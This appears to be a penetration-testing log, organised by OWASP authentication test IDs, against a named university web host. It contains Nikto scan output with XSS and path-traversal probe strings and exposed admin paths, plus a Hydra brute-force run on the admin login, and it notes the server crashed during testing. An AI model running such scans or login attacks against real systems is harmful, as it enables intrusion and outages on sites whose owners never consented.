not found
<Testing for user enumeration (OWASP-AT-002)>
>>we test with a valid user and the right password
>>now I will try to insert an invalid userID and a wrong password
>>before we guess the default password, we search for the admin login interface with nikto
- ***** SSL support not available (see docs for SSL install) *****
- Nikto v2.1.4
---------------------------------------------------------------------------
+ Target IP: 110.76.151.4
+ Target Hostname: www.akakom.ac.id
+ Target Port: 80
+ Start Time: 2011-06-05 14:32:56
---------------------------------------------------------------------------
+ Server: Apache/2.2.3 (CentOS)
+ Retrieved x-powered-by header: PHP/5.3.5
+ robots.txt contains 14 entries which should be manually viewed.
+ ETag header found on server, inode: 5594158, size: 11692, mtime: 0x963c12c0
+ Apache/2.2.3 appears to be outdated (current is at least Apache/2.2.17). Apache 1.3.42 (final release) and 2.0.64 are also current.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS, TRACE
+ DEBUG HTTP verb may show server debugging information. See http://msdn.microsoft.com/en-us/library/e8z01xdh%28VS.80%29.aspx for details.
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ /index.php/\"><script><script>alert(document.cookie)</script><: eZ publish v3 and prior allow Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-3233: /phpinfo.php: Contains PHP configuration information
+ OSVDB-682: /usage/: Webalizer may be installed. Versions lower than 2.01-09 vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-8193: /index.php?module=ew_filemanager&type=admin&func=manager&pathext=../../../etc: EW FileManager for PostNuke allows arbitrary file retrieval.
+ OSVDB-12184: /index.php?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-3092: /error_log: This might be interesting...
+ OSVDB-3092: /includes/: This might be interesting...
+ OSVDB-3092: /login/: This might be interesting...
+ OSVDB-3092: /logs/: This might be interesting...
+ OSVDB-3092: /phpmyadmin/: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
+ OSVDB-3092: /phpMyAdmin/: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
+ OSVDB-3092: /manual/: Web server manual found.
+ OSVDB-3268: /icons/: Directory indexing found.
+ OSVDB-3268: /manual/images/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ 6448 items checked: 2 error(s) and 22 item(s) reported on remote host
+ End Time: 2011-06-05 14:46:34 (818 seconds)
---------------------------------------------------------------------------
we found the login for phpmyadmin
While we were trying to break through phpMyAdmin, the server went down with a MySQL server error
<Brute Force Testing (OWASP-AT-004)>
>>we use hydra to brute-force
Hydra v6.3 (c) 2011 by van Hauser / THC and David Maciejak - use allowed only for legal purposes.
Hydra (http://www.thc.org/thc-hydra) starting at 2011-06-05 13:03:22
[DATA] 3 tasks, 1 servers, 3 login tries (l:1/p:3), ~1 tries per task
[DATA] attacking service http-get on port 80
[VERBOSE] Resolving addresses ... done
[DEBUG] Code: attack Time: 1307253802
[DEBUG] Options: mode 48 ssl 1 restore 0 showAttempt 0 tasks 3 tnp 1 tpsal 1 exit_found 0 miscptr /foo/bar/protected.html service http-get
[DEBUG] Brains: active 0 targets 1 finished 0 todo_all 3 todo 3 sent 0 found 0 countlogin 1 sizelogin 6 countpass 3 sizepass 6
[DEBUG] Target 0 - target www.akakom.ac.id ip 110.76.151.4 login_no 0 pass_no 0 sent 0 pass_state 0 use_count 0 max_use_count 255 done 0 fail_count 0 login_ptr admin pass_ptr admin
[DEBUG] Task 0 - pid 0 active 0 redo 0 current_login_ptr (null) current_pass_ptr (null)
[DEBUG] Task 1 - pid 0 active 0 redo 0 current_login_ptr (null) current_pass_ptr (null)
[DEBUG] Task 2 - pid 0 active 0 redo 0 current_login_ptr (null) current_pass_ptr (null)
[VERBOSE] More tasks defined than login/pass pairs exist. Tasks reduced to 3.
[ATTEMPT] target www.akakom.ac.id - login "admin" - pass "" - child 0 - 1 of 3
[ATTEMPT] target www.akakom.ac.id - login "admin" - pass "admin" - child 1 - 2 of 3
[DEBUG] pass_state: 2 login_no: 0 pass_no: 2 (countlogin: 1 countpass:3)
[STATUS] attack finished for www.akakom.ac.id (waiting for children to finish)
[ATTEMPT] target www.akakom.ac.id - login "admin" - pass "" - child 2 - 4 of 3
DEBUG_CONNECT_OK
DEBUG_CONNECT_OK
DEBUG_CONNECT_OK
Error: SSL Connect 0
Error: SSL Connect 0
Error: SSL Connect 0
Could not create an SSL session: error:00000000:lib(0):func(0):reason(0)
Error: Child with pid 10686 terminating, can not connect
Could not create an SSL session: error:00000000:lib(0):func(0):reason(0)
Error: Child with pid 10685 terminating, can not connect
Could not create an SSL session: error:00000000:lib(0):func(0):reason(0)
Error: Child with pid 10684 terminating, can not connect
Hydra (http://www.thc.org/thc-hydra) finished at 2011-06-05 13:03:23
<finished>
<Testing for bypassing authentication schema (OWASP-AT-005)>
<Testing for vulnerable remember password and pwd reset (OWASP-AT-006)>
>>this site has a forgot-password facility for its members
<Testing for Logout and Browser Cache Management (OWASP-AT-007)>
<Testing for CAPTCHA (OWASP-AT-008)>
not found
<Testing Multiple Factors Authentication (OWASP-AT-009)>
<Testing for Race Conditions (OWASP-AT-010)>